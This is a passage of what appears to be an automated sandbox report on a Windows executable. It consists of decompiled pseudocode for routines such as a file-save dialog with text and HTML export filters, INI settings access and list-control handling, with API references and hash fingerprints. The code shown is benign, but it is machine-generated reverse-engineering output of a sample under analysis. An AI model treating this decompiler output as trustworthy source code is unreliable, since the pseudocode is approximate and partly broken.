						if(_t60 >= 0) {
							L17:
							_v12 =  *((intOrPtr*)(_t92 +  *((intOrPtr*)(_t76 + 0x2e4))));
							goto L18;
						}
						__eflags = _t62;
						if(_t62 < 0) {
							goto L18;
						}
						goto L17;
						L18:
						_v8 = _v8 + 1;
						_t92 = _t92 + 0x14;
						__eflags = _v8 -  *((intOrPtr*)(_t76 + 0x2e0));
					} while (_v8 <  *((intOrPtr*)(_t76 + 0x2e0)));
					goto L19;
				}
				_t94 = 0;
				__eflags = 0;
				do {
					_push(_a4);
					_t66 =  *((intOrPtr*)(_t76 + 0x2e4));
					_push( *((intOrPtr*)(_t94 + _t66 + 0x10)));
					L0040E03E();
					_push(_a4);
					_t67 =  *((intOrPtr*)(_t76 + 0x48));
					_push( *((intOrPtr*)(_t67 + _t94 + 0x10)));
					L0040E03E();
					_t95 = _t95 + 0x10;
					__eflags = _t66;
					if(_t66 == 0) {
						L11:
						_v12 =  *(_t94 +  *((intOrPtr*)(_t76 + 0x2e4)));
						_v16 = 1;
						goto L12;
					}
					__eflags = _t67;
					if(_t67 != 0) {
						goto L12;
					}
					goto L11;
					L12:
					_v8 = _v8 + 1;
					_t94 = _t94 + 0x14;
					__eflags = _v8 -  *((intOrPtr*)(_t76 + 0x2e0));
				} while (_v8 <  *((intOrPtr*)(_t76 + 0x2e0)));
				__eflags = _v16;
				if(_v16 != 0) {
					goto L19;
				}
				goto L14;
			}

0x0040a08d
0x0040a08f
0x0040a096
0x0040a099
0x0040a09b
0x0040a09b
0x0040a0a9
0x00000000
0x00000000
0x0040a0ab
0x0040a0af
0x00000000
0x00000000
0x0040a0b2
0x0040a0bb
0x00000000
0x00000000
0x0040a0bd
0x0040a0be
0x0040a0c6
0x0040a0e7
0x0040a0e7
0x0040a1af
0x0040a1b6
0x0040a1b8
0x0040a1b8
0x0040a1bf
0x0040a1c5
0x0040a1c8
0x0040a1ce
0x0040a1d6
0x0040a1d6
0x0040a0ef
0x0040a0f5
0x0040a0f8
0x0040a0fb
0x0040a157
0x0040a157
0x0040a159
0x0040a15f
0x0040a162
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a164
0x0040a164
0x0040a171
0x0040a182
0x0040a187
0x0040a18a
0x0040a18c
0x0040a192
0x0040a19b
0x00000000
0x0040a19b
0x0040a18e
0x0040a190
0x00000000
0x00000000
0x00000000
0x0040a19e
0x0040a19e
0x0040a1a4
0x0040a1a7
0x0040a1a7
0x00000000
0x0040a164
0x0040a0fd
0x0040a0fd
0x0040a0ff
0x0040a0ff
0x0040a102
0x0040a108
0x0040a10c
0x0040a111
0x0040a116
0x0040a119
0x0040a11d
0x0040a122
0x0040a125
0x0040a127
0x0040a12d
0x0040a136
0x0040a139
0x00000000
0x0040a139
0x0040a129
0x0040a12b
0x00000000
0x00000000
0x00000000
0x0040a140
0x0040a140
0x0040a146
0x0040a149
0x0040a149
0x0040a151
0x0040a155
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00407A66: ??2@YAPAXI@Z.MSVCRT ref: 00407A87
Part of subcall function 00407A66: ??3@YAXPAX@Z.MSVCRT ref: 00407B4E

wcslen.MSVCRT ref: 0040A0B2
_wtoi.MSVCRT ref: 0040A0BE
_wcsicmp.MSVCRT ref: 0040A10C
_wcsicmp.MSVCRT ref: 0040A11D

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsicmp$??2@??3@_wtoiwcslen
String ID:
API String ID: 1549203181-0
Opcode ID: 7dd6d63d10815eadb1078566161622f675861b17a3bacd31860cb4180f0995c0
Instruction ID: 173153ae92e8ec93863a9f5982dcfa1c11e383f1bf25a9e136d2eac58130d476
Opcode Fuzzy Hash: 7dd6d63d10815eadb1078566161622f675861b17a3bacd31860cb4180f0995c0
Instruction Fuzzy Hash: D2415C31900304AFCB21DF69C580A9EBBB4EF44355F1444BAEC05EB396D678DAA18B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB6E, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AB6E(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v12;
				char _v16;
				char* _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				char* _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char* _v76;
				char _v80;
				void _v2126;
				signed short _v2128;
				void* __ebx;
				void* __edi;
				char _t32;
				intOrPtr _t33;
				char _t34;
				intOrPtr _t38;
				signed short _t57;
				char* _t62;
				char* _t64;

				_v2128 = _v2128 & 0x00000000;
				memset( &_v2126, 0, 0x7fe);
				_t32 =  *((intOrPtr*)(L"txt")); // 0x780074
				_v16 = _t32;
				_t33 =  *0x410294; // 0x74
				_v12 = _t33;
				_t34 = E00406827(0x1f5);
				_t64 = L"*.txt";
				_v80 = _t34;
				_v76 = _t64;
				_v72 = E00406827(0x1f6);
				_v68 = _t64;
				_v64 = E00406827(0x1f7);
				_v60 = L"*.json";
				_v56 = E00406827(0x1fb);
				_v52 = L"*.csv";
				_t38 = E00406827(0x1f8);
				_t62 = L"*.htm;*.html";
				_v48 = _t38;
				_v44 = _t62;
				_v40 = E00406827(0x1f9);
				_v36 = _t62;
				_v32 = E00406827(0x1fa);
				_v28 = L"*.xml";
				_v24 = E00406827(0x1fc);
				_v20 = _t64;
				E00406050( &_v2128,  &_v80);
				_t57 = 7;
				return E00405DCD(_a12,  *((intOrPtr*)(_a4 + 0x208)), _a8,  &_v2128, E00406827(_t57),  &_v16);
			}

0x0040ab77
0x0040ab90
0x0040ab95
0x0040ab9a
0x0040ab9d
0x0040abaa
0x0040abad
0x0040abb2
0x0040abb8
0x0040abbb
0x0040abc8
0x0040abcb
0x0040abd6
0x0040abd9
0x0040abea
0x0040abed
0x0040abf4
0x0040abf9
0x0040abff
0x0040ac02
0x0040ac0f
0x0040ac12
0x0040ac1d
0x0040ac20
0x0040ac2c
0x0040ac39
0x0040ac3c
0x0040ac44
0x0040ac71

APIs

memset.MSVCRT ref: 0040AB90

Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F

Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4

Part of subcall function 00406050: memset.MSVCRT ref: 00406071
Part of subcall function 00406050: _snwprintf.MSVCRT ref: 0040609F
Part of subcall function 00406050: wcslen.MSVCRT ref: 004060AB
Part of subcall function 00406050: memcpy.MSVCRT ref: 004060C3
Part of subcall function 00406050: wcslen.MSVCRT ref: 004060D1
Part of subcall function 00406050: memcpy.MSVCRT ref: 004060E4

Part of subcall function 00405DCD: GetSaveFileNameW.COMDLG32(?), ref: 00405E1C
Part of subcall function 00405DCD: wcscpy.MSVCRT ref: 00405E33

Strings

txt, xrefs: 0040AB95
*.htm;*.html, xrefs: 0040ABF9
*.txt, xrefs: 0040ABB2

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameSaveString_snwprintf
String ID: *.htm;*.html$*.txt$txt
API String ID: 1392923015-1706329710
Opcode ID: 9ddafcd3e3873cef2600ad60d320d0a67768a4cae7d1907286cd4c839e47c819
Instruction ID: 6a1f0fe5a8f9a0d06c10808573add6bd6f8ed95605c5985f6cf117c7f3196cfa
Opcode Fuzzy Hash: 9ddafcd3e3873cef2600ad60d320d0a67768a4cae7d1907286cd4c839e47c819
Instruction Fuzzy Hash: 5C215EB2D0121A9FCB40EF96D885ADDBBB4FF04308F10807BE409B7281DB7859418F99

Uniqueness

Uniqueness Score: -1.00%

Function 00406613, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00406613(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040E038();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040E032();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}

0x00406613
0x00406614
0x00406614
0x00406617
0x0040661b
0x0040662e
0x0040662e
0x00406632
0x00406634
0x0040663a
0x0040663b
0x0040663e
0x00406647
0x00406648
0x0040664d
0x00406657
0x00406659
0x0040665e
0x00406665
0x0040666f
0x00406671
0x00406672
0x00406677
0x0040667e
0x00406687
0x0040661d
0x0040661d
0x0040661f
0x00406621
0x00406626
0x00406627
0x0040662a
0x0040662c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040662c
0x00406697
0x0040669a
0x004066a3
0x004066a3
0x0040668c
0x00406690

APIs

??2@YAPAXI@Z.MSVCRT ref: 00406648
memset.MSVCRT ref: 00406659
memcpy.MSVCRT ref: 00406665
??3@YAXPAX@Z.MSVCRT ref: 00406672

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: b3bebb2b07f3d72bfc287334a96ab2eb9d003ca0e48cb49cfb9246c624c4ecc5
Instruction ID: 0097541d92ab95bcfef6608398cdc2c51d263adba4e227b481c9d82b5fae792d
Opcode Fuzzy Hash: b3bebb2b07f3d72bfc287334a96ab2eb9d003ca0e48cb49cfb9246c624c4ecc5
Instruction Fuzzy Hash: EB114C716046019FD328DF2DC881A26F7E9EFD8300B218D3EE59A97395DA76E811CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5E8, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E0040D5E8(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040E340(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40f454,  &_v16392, 0x2000, _a20);
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E00405F0A( &_v16392, _t34, _a16);
				} else {
					memset();
					E00405E81(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}

0x0040d5e8
0x0040d5f0
0x0040d5fc
0x0040d601
0x0040d602
0x0040d60f
0x0040d611
0x0040d612
0x0040d647
0x0040d669
0x0040d676
0x0040d67f
0x0040d681
0x0040d614
0x0040d614
0x0040d625
0x0040d643
0x0040d643
0x0040d68d

APIs

memset.MSVCRT ref: 0040D614

Part of subcall function 00405E81: _snwprintf.MSVCRT ref: 00405EC6
Part of subcall function 00405E81: memcpy.MSVCRT ref: 00405ED6

WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040D63D
memset.MSVCRT ref: 0040D647
GetPrivateProfileStringW.KERNEL32 ref: 0040D669

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
String ID:
API String ID: 1127616056-0
Opcode ID: 1ef896f5ac476238214e2e7a1c8d83b09bc725c3f104deaf738d1964be3b1b7d
Instruction ID: e5ada5cee961c9ffd84a11649d97ac6ffa4cf685c3efd691eec2e39df5646265
Opcode Fuzzy Hash: 1ef896f5ac476238214e2e7a1c8d83b09bc725c3f104deaf738d1964be3b1b7d
Instruction Fuzzy Hash: D5118272500119AFDF11AF65DC02E9E7B79EF04704F100476FF09B20A1E6359A649F9D

Uniqueness

Uniqueness Score: -1.00%

Function 00402B94, Relevance: 6.1, APIs: 4, Instructions: 53
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B94(struct HWND__* _a4, int _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
				signed int _v32;
				void _v48;
				void* _v52;
				int _v68;
				intOrPtr _v72;
				signed int _v80;
				int _v92;
				void _v96;
				void* _v100;
				signed int _t34;

				memset( &_v96, 0, 0x2c);
				_v100 = _a12;
				_v80 = _a16;
				_v72 = _a20;
				_v96 = 0;
				_v92 = 0;
				_v68 = 0;
				memset( &_v48, 0, 0x2c);
				_v52 = 4;
				if(SendMessageW(_a4, 0x120b, _a8,  &_v52) != 0) {
					_t34 = _v32 & 0x00000003;
					if(_t34 != 0) {
						_v80 = _v80 & 0xfffffffc | _t34;
					}
				}
				return SendMessageW(_a4, 0x120c, _a8,  &_v100);
			}

0x00402ba8
0x00402bb0
0x00402bb7
0x00402bc0
0x00402bca
0x00402bce
0x00402bd2
0x00402bd6
0x00402bec
0x00402c00
0x00402c06
0x00402c09
0x00402c14
0x00402c14
0x00402c09
0x00402c2e

APIs

memset.MSVCRT ref: 00402BA8
memset.MSVCRT ref: 00402BD6
SendMessageW.USER32(?,0000120B), ref: 00402BFC
SendMessageW.USER32(?,0000120C,?,?), ref: 00402C28

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendmemset
String ID:
API String ID: 568519121-0
Opcode ID: 3dbf91b2b69beef7f82be7727ae9dd33bc881aaf68ef105acbafed814d97d997
Instruction ID: b9af20001e59f3bd0701389c088e4a3ca17ea943e2d6bc3205c17ab3910d7cc1
Opcode Fuzzy Hash: 3dbf91b2b69beef7f82be7727ae9dd33bc881aaf68ef105acbafed814d97d997
Instruction Fuzzy Hash: 61115B72508314ABD711DF14CC0199FBFE8EB89750F004A2AFA64E7290D371DA20CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3BF, Relevance: 6.0, APIs: 4, Instructions: 50
windowCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0040A3BF(void* __esi) {
				void* _v516;
				long _v1028;
				void* __ebx;
				wchar_t* _t15;
				signed short _t23;
				signed short _t25;
				void* _t29;

				_t29 = __esi;
				_push(E0040778A( *((intOrPtr*)(__esi + 0x69c))));
				_t23 = 4;
				_push(E00406827(_t23));
				_push(0xff);
				_push( &_v516);
				L0040DFD6();
				_t15 = E00407E16( *((intOrPtr*)(__esi + 0x69c)), 0);
				if(_t15 > 0) {
					_push(_t15);
					_t25 = 5;
					_push(E00406827(_t25));
					_push(0xff);
					_push( &_v1028);
					L0040DFD6();
					_t15 = wcscat( &_v516,  &_v1028);
				}
				if( *((intOrPtr*)(_t29 + 0x208)) != 0) {
					return SendMessageW( *(_t29 + 0x214), 0x40b, 0,  &_v516);
				}
				return _t15;
			}

0x0040a3bf
0x0040a3d5
0x0040a3d8
0x0040a3de
0x0040a3ea
0x0040a3eb
0x0040a3ec
0x0040a3fc
0x0040a403
0x0040a405
0x0040a408
0x0040a40e
0x0040a415
0x0040a416
0x0040a417
0x0040a42a
0x0040a42f
0x0040a43b
0x00000000
0x0040a451
0x0040a458

APIs

Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F

_snwprintf.MSVCRT ref: 0040A3EC
SendMessageW.USER32(?,0000040B,00000000,?), ref: 0040A451

Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4

_snwprintf.MSVCRT ref: 0040A417
wcscat.MSVCRT ref: 0040A42A

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
String ID:
API String ID: 822687973-0
Opcode ID: fa48f0b94a06f49b58a326b4bcc618fa866d7abdeda14d17ebe30566094cc372
Instruction ID: d08295fd2af1cf787610e7cf5331bd4bc3d6faa59d3d329b1d8aec9a5db4e45c
Opcode Fuzzy Hash: fa48f0b94a06f49b58a326b4bcc618fa866d7abdeda14d17ebe30566094cc372
Instruction Fuzzy Hash: 5C01D8B29003096AE720F275CC8AFA773ACAB40318F00447EB71AF10C2D679A9154A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040576B, Relevance: 6.0, APIs: 4, Instructions: 47
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040576B(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}

0x00405789
0x00405791
0x00405795
0x00405798
0x0040579b
0x004057b9
0x004057b9
0x0040579d
0x0040579d
0x004057ae
0x004057b7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004057b7
0x004057ca
0x004057ce
0x004057ce
0x004057bb
0x004057bf

APIs

GetDlgItem.USER32 ref: 00405779
SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00405791
SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 004057A7
SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 004057CA

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item
String ID:
API String ID: 3888421826-0
Opcode ID: 84320e977df6a92d9295fdec2ba4224318a32ded31fcf9cf43a568e2f97b542c
Instruction ID: ea6b6bb6de5f5fc2c04e1b050f2a77b7acc78c850c927156145779c4c3b5f003
Opcode Fuzzy Hash: 84320e977df6a92d9295fdec2ba4224318a32ded31fcf9cf43a568e2f97b542c
Instruction Fuzzy Hash: FEF01975A0010CFFEB119F95CDC5DAFBBB9EB49794F20447AFA04E6150D2709E01AA64

Uniqueness

Uniqueness Score: -1.00%

Function 00402F8E, Relevance: 6.0, APIs: 4, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00402F8E(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				struct HWND__* _t16;
				intOrPtr* _t36;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr* _t49;

				_t40 = __edx;
				_push(__ebx);
				_t47 = __ecx;
				E00401712( *((intOrPtr*)(__ecx + 0x10)), __edx, __ecx + 0x40, __eflags);
				E0040DB6F(GetDlgItem( *(_t47 + 0x10), 0x3f1));
				SetFocus(GetDlgItem( *(_t47 + 0x10), 0x3ee));
				_t16 = GetDlgItem( *(_t47 + 0x10), 0x3ee);
				E00405700(_t16, E00406827(0x3b7), 1);
				E00405700(_t16, E00406827(0x3b8), 2);
				E0040300B(_t47);
				_t36 = _t47;
				_pop(_t48);
				_t49 = _t36;
				 *((intOrPtr*)( *_t49 + 4))(1, _t48);
				 *((intOrPtr*)( *_t49 + 0x1c))();
				E00405B17(_t40,  *((intOrPtr*)(_t49 + 0x10)), 4);
				return 0;
			}

0x00402f8e
0x00402f8e
0x00402f90
0x00402f99
0x00402faf
0x00402fc2
0x00402fcc
0x00402fdc
0x00402ff2
0x00402ffc
0x00403002
0x00403004
0x0040165a
0x00401660
0x00401667
0x0040166f
0x00401679

APIs

Part of subcall function 00401712: GetClientRect.USER32 ref: 0040171E
Part of subcall function 00401712: GetWindow.USER32(?,00000005), ref: 00401737
Part of subcall function 00401712: GetWindow.USER32(00000000), ref: 0040173A
Part of subcall function 00401712: GetWindow.USER32(00000000,00000002), ref: 0040174C

GetDlgItem.USER32 ref: 00402FAC

Part of subcall function 0040DB6F: LoadLibraryW.KERNEL32(shlwapi.dll,774148C0,?,00402FB4,00000000), ref: 0040DB78
Part of subcall function 0040DB6F: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040DB86
Part of subcall function 0040DB6F: FreeLibrary.KERNEL32(00000000,?,00402FB4,00000000), ref: 0040DB9E

GetDlgItem.USER32 ref: 00402FBF
SetFocus.USER32(00000000), ref: 00402FC2
GetDlgItem.USER32 ref: 00402FCC

Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F

Part of subcall function 00405700: SendMessageW.USER32(?,00000143,00000000,?), ref: 00405717
Part of subcall function 00405700: SendMessageW.USER32(?,00000151,00000000,?), ref: 00405729

Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemWindow$HandleLibraryLoadMessageModuleSend$AddressClientFocusFreeProcRectStringmemcpywcscpywcslen
String ID:
API String ID: 2946568780-0
Opcode ID: 52cbf3b4b279be617207ad7872dd7437349133491b3365fd1e852972f4b5ad5a
Instruction ID: 30f591fb8b2f5730a97996d02f89d272a17373ddbf4734e32a48e8550da6c286
Opcode Fuzzy Hash: 52cbf3b4b279be617207ad7872dd7437349133491b3365fd1e852972f4b5ad5a
Instruction Fuzzy Hash: 46F0C8B2A00700E7D22177B6AC46E2B76ACEF84719F06093EF541F71D2CA799D055658

Uniqueness

Uniqueness Score: -1.00%

Function 0040877D, Relevance: 6.0, APIs: 4, Instructions: 41
filestringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040877D(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v32775;
				char _v32776;

				E0040E340(0x8004, __ecx);
				_v32776 = 0;
				memset( &_v32775, 0, 0x7fff);
				WideCharToMultiByte(0xfde9, 0, _a8, 0xffffffff,  &_v32776, 0x7fff, 0, 0);
				return WriteFile(_a4,  &_v32776, strlen( &_v32776),  &_v8, 0);
			}

0x00408785
0x0040879c
0x004087a2
0x004087bf
0x004087eb

APIs

memset.MSVCRT ref: 004087A2
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000003,000000FF,?,00007FFF,00000000,00000000), ref: 004087BF
strlen.MSVCRT ref: 004087D1
WriteFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 004087E2

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: 51ae4e62cfb9bf55f12b25eeafec9d01389194143adb00a77a57f99ffa8f8497
Instruction ID: be2e12bba75bd4d95a24d89f44609daf6c821d09d66759c01e9b41f40a714cd1
Opcode Fuzzy Hash: 51ae4e62cfb9bf55f12b25eeafec9d01389194143adb00a77a57f99ffa8f8497
Instruction Fuzzy Hash: 66F062B640112CBEEB91AB95DD81DEB776CEB04258F0045B2B705E6180D974AE484F7C

Uniqueness

Uniqueness Score: -1.00%

Function 004087EC, Relevance: 6.0, APIs: 4, Instructions: 41
filestringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004087EC(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040E340(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}

0x004087f4
0x0040880b
0x00408811
0x0040882a
0x00408856

APIs

memset.MSVCRT ref: 00408811
WideCharToMultiByte.KERNEL32(00000000,00000000,00000003,000000FF,?,00001FFF,00000000,00000000), ref: 0040882A
strlen.MSVCRT ref: 0040883C
WriteFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 0040884D

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
